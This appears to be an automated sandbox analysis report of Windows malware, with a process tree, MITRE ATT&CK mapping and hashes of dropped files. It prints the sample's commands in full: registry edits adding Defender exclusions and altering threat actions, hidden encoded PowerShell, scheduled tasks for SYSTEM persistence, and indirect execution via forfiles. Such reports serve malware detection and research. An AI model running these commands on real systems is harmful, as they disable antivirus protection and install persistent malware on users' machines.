C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:643⤵PID:1416
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cBfgrRECHDYJtCCxauR" /t REG_DWORD /d 0 /reg:323⤵PID:3868
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cBfgrRECHDYJtCCxauR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3932 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgvwDscPBpUn" /t REG_DWORD /d 0 /reg:323⤵PID:4112
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgvwDscPBpUn" /t REG_DWORD /d 0 /reg:643⤵PID:3512
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sozrmRSxWUyU2" /t REG_DWORD /d 0 /reg:323⤵PID:4704
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sozrmRSxWUyU2" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1936 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xFHhRZnoU" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3300 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xFHhRZnoU" /t REG_DWORD /d 0 /reg:643⤵PID:2800
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\asFrGLUBkJEUSBVB /t REG_DWORD /d 0 /reg:323⤵PID:4992
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\asFrGLUBkJEUSBVB /t REG_DWORD /d 0 /reg:643⤵PID:4832
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2620
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5020
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2012 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2864
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa /t REG_DWORD /d 0 /reg:323⤵PID:2824
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa /t REG_DWORD /d 0 /reg:643⤵PID:1156
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gXItsKzEGiJHAsry /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gXItsKzEGiJHAsry /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2944 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIoHxkEwv" /SC once /ST 16:10:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:2640 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gIoHxkEwv"2⤵PID:2084
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gIoHxkEwv"2⤵PID:2716
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XvjVthUohNRwdLXcW" /SC once /ST 04:58:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe\" Zb /GTIadidPc 385133 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1892 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XvjVthUohNRwdLXcW"2⤵PID:3056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 12642⤵
- Program crash
PID:1960
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1996 -ip 19961⤵PID:3256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1996 -ip 19961⤵PID:4548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1996 -ip 19961⤵PID:3240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1996 -ip 19961⤵PID:1648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1996 -ip 19961⤵PID:676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1996 -ip 19961⤵PID:2064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1996 -ip 19961⤵PID:2468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1996 -ip 19961⤵PID:4560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1996 -ip 19961⤵PID:5028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1996 -ip 19961⤵PID:2900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1996 -ip 19961⤵PID:1316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1996 -ip 19961⤵PID:544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4176 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3868
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4252
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2824
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1732
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3484 -ip 34841⤵PID:2892
-
C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exeC:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe Zb /GTIadidPc 385133 /S1⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3964 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
PID:2196 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3836 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:4820 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2620 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:2824 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:4940 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:3008
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:5028 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:2688
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1728
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:3476 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:4368
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1612
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:5036 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
PID:2376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4556 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:1548
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bPUvzXzfJRZdhTmsKY"2⤵PID:2884
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
- System Location Discovery: System Language Discovery
PID:3056 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
- Indirect Command Execution
PID:3836 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:4940
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4180 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:956 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\xFHhRZnoU\rvmgQR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "XsUoLYLFLViNzfg" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5060 -ip 50601⤵PID:2064
-
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe1⤵
- Executes dropped EXE
PID:4156 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4156 -s 3842⤵
- Program crash
PID:4424
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4156 -ip 41561⤵PID:2128
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indirect Command Execution
1Modify Registry
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD56f3060dab86d0e1632d896afe7ddd104
SHA1a178451339e8ff086dcbb14679686c0630a6a226
SHA256716639310f3fac0ed0f5c99ab8a54e7f01197e77bc77ae665e4eea024a9e780b
SHA512971da8c03301d7f90481ffa90ab957571176abfddc106e99c96c3ec4b9e4d659437efb07e1d759685bc220fb72e570880ba10bfb4febdf4768201ef046b19d86
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
1.1MB
MD57adfc6a2e7a5daa59d291b6e434a59f3
SHA1e21ef8be7b78912bed36121404270e5597a3fe25
SHA256fbb957b3e36ba1dda0b65986117fd8555041d747810a100b47da4a90a1dfd693
SHA51230f56bd75fe83e8fb60a816c1a0322bc686863d7ab17a763fff977a88f5582c356b4fcfe7c0c9e3e5925bfee7fc44e4ea8b96f82a011ed5e7cd236253187181b
-
Filesize
2.5MB
MD52dbdc645b9776239b18f772c30c1a626
SHA18677b8ea4f077a8c708a0d894e18513828c30322
SHA2562b92d1c34b7f0278703c98e9fd755e061d0f120eea327996b223dfc65610dfcd
SHA512ae5499ad2c40bd8756d614fea51f48c7b8fca4621b489da97f05cc55cf4a9a6032f9ec0c70ed03915da0e021ed9e4cca16810b18d3825ece9dac25e1d74d6fec
-
Filesize
1.3MB
MD531f04226973fdade2e7232918f11e5da
SHA1ff19422e7095cb81c10f6e067d483429e25937df
SHA256007c6dfe4466894d678c06e6b30df77225450225ddd8e904e731cab32e82c512
SHA51242198fc375993a09da3c8a2766ee6831cf52ff8cd60b3eb4256a361afa6963f64a0aff49adb87c3b22950e03c8ef58a94655959771f8d2d5b754012706220f66
-
Filesize
2.5MB
MD567846d1862f63942b00eb61e47be2652
SHA1a018b557975a35fa8c001a43a55d08cef7d426f2
SHA256b8df70d0227e4277fa8e1e2efe6f86c4c087f60a68744aa89df83d1cdd15253f
SHA5125dc36ebb7b3148c23f0e248971d04519587f7da0ff9320a85f64ddf1e9b10e907aa7d88feec725b385e514816c829d375b01f91d4c64d3c0ae6664a9d5906150
-
Filesize
7.3MB
MD562910a92441aac7a282513aeb9f6fd6a
SHA1eeaae9e540a7f4210975318da5742ee01c77f3ff
SHA256adcbe92d574ca3cde6796fa43663a9c042be98c80cdb8181001f3d4161df05c4
SHA512d0702fa3c50768074425425fb4bce9f678ce5c97764d39be718f250b5d441dd1cc250ed3feaa1337af2739d9a87d5a8850b69ebebb149bcc2d17887bd0334971
-
Filesize
481KB
MD5f9a4f6684d1bf48406a42921aebc1596
SHA1c9186ff53de4724ede20c6485136b4b2072bb6a6
SHA256e0a051f93d4c1e81cc142181d14249e246be4c169645d667267134b664e75042
SHA51267294a47dfef6aba404939497c403f93318841e9c5ee28b706f7506b5dff2630381e28e86f6dcbfdff2427092a515db1dc0a04e334e7f8de8b0b682269ff88fd
-
Filesize
552KB
MD51873f27a43f63c02800d6c80014c0235
SHA13441bba24453db09fb56e02a9d56cdf775886f07
SHA2564bfcba248d79dfd6c2cba52d7c9ee18842f007bfa0e3ba99ababacb4794e8c6e
SHA5129f2b663afc1cc3dbc8eba3278f61ffb41c19e42f94ee4c8a60eff83c8846b81d34e4ff869b643434a8ad5657c46bd06a712f0598062b62802ba6f0ee6f4fb8f2
-
Filesize
74KB
MD50c5bb1605df7dbc457378472c0a73518
SHA114608ed3aee6033eaddba0e1d422df776d84e673
SHA256d4978f007c3009c008b69838ef75e47abf0011ec71089b0801c9745f4ef659ac
SHA5129e62a50448677c9084fa3164cfb8ae6283bcdb76340b7483ee6e2d27c8e813b3b107216e58e91d129a8ec40f0bba817b502c021cd428f47dd07cc81c5be3df4e
-
Filesize
662KB
MD5d6a0473754ad77650d88eaa94cf4bcf0
SHA1d2123bf8b796fe6f76e570641037d9420b3f3c78
SHA256355d2dc53492ea6ba26263dd8a2f7544ae3a36c17f64cccb6ad84007bebafbb7
SHA51214d844255fb657a039d4f94ddcc58acc79d44fdc58882ace49a453c537db86ceeef9a10640d83ff20af2caa0e880de3e77b7afbf2af79291873c0f81db72d3bc
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
554KB
MD530ab54ae1c615436d881fc336c264fef
SHA17e2a049923d49ae5859d2a0aa3a7dd092e672bd1
SHA256ff64ae2a70b07eba7678241a8fa20f3569a03cc5cdc087306a4451acd97ee2db
SHA5121af06fd6d67c59df3a32fbc4c12e8788f5e3b46a1ca2e1ddc8bc9926d1bacb0b702f2d88e950fc04145d3b904e60e8910acf6fc0f87bd676459b10fc25707be9
-
Filesize
1.8MB
MD56a87310841f87d194c991b1ce0f7b998
SHA138f5b601fb4f0d7cf1f53a10682c1a6c53cf2ce8
SHA2561bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d
SHA512c838f2d581953465bc93dd1481f3370e91c7e7c567243e5410159060a7662dcd3fb1900fa945a76b829f77cc6df70076f6bc33e58794c51a06651c0216762c2f
-
Filesize
6.4MB
MD579120912ad03b169e423624a28649c98
SHA16914f4082bfd0904404138a74273be4b024b9bef
SHA2560da4ea8790028db008943f30563a65e43f4a42a51404d9cb26730ab7dac94f98
SHA51279241ca18e19add662a8531d5d4935521d7d9e6dbd0dd559aaffbb231989aaf68e4cc39eeec82b06dde766c5b52fdd98661322156d2b626e472a3fd7fba512f7
-
Filesize
6.6MB
MD55a5bbf5d5fe247f380ab26ae580ecff4
SHA151bfa443888bbaf2e81ae783691fa00e979e1c7a
SHA256b81aa596296218a3cbc2c51287b90dbec46b3312b376d6d43bac6f397fac1517
SHA51212a472b94748343dffd86ac722c0c021eb91872a67e35cd0b920cbe33e2d6f629f281ba8708aaeba228c5b551900d9ff9105becd2d83f066eb92dd878c8a48bc
-
Filesize
63KB
MD52078e604090ab3f34e7254584f5b5e18
SHA16c6923837538fe0516a7395fd114c6000da29fdb
SHA2569b129a2e4cef84ec4f1101524cdec497f7daeed3fda8cac227803772ebb80ca7
SHA512af16f5679fc77dfd32c2bc2bfcaf80f56d633a3cb47941565f35ca84c5b385eeebd4caf8a703860a2e3b1a55a808a576a85ed0c5a6595ffa7d2fb0435dbee08f
-
Filesize
62KB
MD5452ec03a6dc9758ff5c0d17f9e55572a
SHA1194df13d1dd92f3c986bb1b196eebf6e25900412
SHA256bd9b030da3887b0cb821ef37aab7771d7d048c05835c3eb5ee034cd077a85cd3
SHA512f2d6979ac9915991020522d4c7218e431a437d9b06b40c395923fdacc514056f01ca127f4264697f0e49faf88b15df8eb6cca80f69e0983f4af7dcda51a87f6c
-
Filesize
52KB
MD55383c87dff2feb9b2c8e93c4bed93e34
SHA11487faf6f6e098fd878f4536bb99cf8c628b12a4
SHA256963b21a66a6afd24e3c8eab4e9d3fa803caca58f2f1e2cbd2e80451ab2b5bb73
SHA512af6219b70b180518f7a5866e95719e23a28394b814239f38250383511b7da1d3712dbd49be75e375f66226192dfc2d46dd905f0733e6bfffe13eeac3ef9f975d
-
Filesize
31KB
MD56184a8fc79d602bc18c0badb08598580
SHA1de3a273e7020d43729044e41272c301118cc3641
SHA256a8181f349864c6c9a216935894392b75d0d1430d43a255ff3a9ad56c325487e7
SHA51241687b30ecd957eb1b6d332133f1c1d7e01cc1c8bf56526dfa20de3937ed549133e93872380e3b51b63b33134c62d4df91c7e08e908ca18b3e6f9d52e89378cb
-
Filesize
14KB
MD52226738a67da04cef580c99f70b9a514
SHA148bbfbfdce94231ebc1833b87ff6e79aa716e3b4
SHA256e04a1b86ce1a5352f7c3a5ddb8b500993f4342ef4e188ed156009e5271795af1
SHA512c653aafd3aa2d320eef1d5b9cf9e58372e778c41147c3d85bcb6e231c8703d19f410ebb2f58f2a9f0671f027fce2baeeec70252e926bb9880128ba6dcedfdb08
-
Filesize
871KB
MD57eb7312237cf8653a876136046ce8b3e
SHA1250d61e72b9a6d0d436e04b569459bb69bb2ab9e
SHA256fa349d460b066e9b325db200251ae35892353462c352728cfb0fa405c293f725
SHA512778fbbec7cd5c9d2aa3623f73604fd7a6e98d3673b50ab7e8ac54c8aa3d955c103d7cdc0838e00f256ade000c979860bf54d3d2b36dd3dcd4fe8fca9f1c82699
-
Filesize
89KB
MD530a3ed3849e36b4c26a02cf030ea985a
SHA1d3d29d3ba2c033d0abb6105cd274001e65d07f4e
SHA2566d86469ced96b57db84de11f9eac77c8076a3bfa65942776f7cc50625fbd31ca
SHA512158aabac6f79393a2a7faed30693f78191bf97771a6125229873abedceef71d5df7d5bb934fdfa1ff4c683df49a158e5ba3efea9a4dd10dce8ba24b3c4fc507d
-
Filesize
75KB
